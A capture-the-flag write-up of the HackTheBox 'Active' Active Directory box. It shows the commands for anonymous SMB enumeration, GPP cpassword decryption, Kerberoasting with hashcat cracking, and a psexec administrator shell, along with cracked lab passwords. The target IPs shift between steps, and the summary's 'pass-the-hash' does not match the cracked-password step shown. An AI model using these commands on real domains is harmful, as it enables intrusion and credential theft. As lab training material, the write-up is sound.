Skip to content

Active -- HackTheBox (write-up)

Difficulty: Easy / Beginner Box: Active (HackTheBox) Author: dsec Date: 2025-12-02


TL;DR

Anonymous SMB access to Replication share revealed GPP-encrypted credentials. Decrypted with gpp-decrypt, then Kerberoasted the Administrator account. Pass-the-hash with psexec for domain admin.


Target info

  • Host: 10.129.78.4
  • Domain: active.htb

Enumeration

Nmap results

Ran enum4linux with null creds:

enum4linux -a -u "" -p "" 10.129.78.4

Enum4linux

Spidered SMB shares with nxc:

nxc smb 10.129.78.4 -u '' -p '' -M spider_plus && cat /tmp/nxc_spider_plus/10.129.78.4.json

Spider results


Initial foothold -- GPP password

Groups.xml

Connected to SMB and found Groups.xml in the Replication share containing a GPP-encrypted password for SVC_TGS:

smbclient.py 10.129.78.4

Decrypted the cpassword:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Password: GPPstillStandingStrong2k18

Confirmed access:

smbclient.py active.htb/svc_tgs:GPPstillStandingStrong2k18@10.129.78.4

Got user flag from Users\SVC_TGS\Desktop\user.txt.


Privesc -- Kerberoasting

Requested service tickets:

GetUserSPNs.py -request -dc-ip 10.129.140.216 active.htb/svc_tgs

Got a TGS hash for the Administrator account. Cracked it with hashcat:

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Password: Ticketmaster1968

Got domain admin shell:

psexec.py active.htb/administrator@10.129.74.111

Lessons & takeaways

  • GPP passwords in SYSVOL are trivially decryptable -- always check Replication/SYSVOL shares
  • Kerberoasting is effective when service accounts have weak passwords
  • Anonymous SMB access can be the initial foothold on AD boxes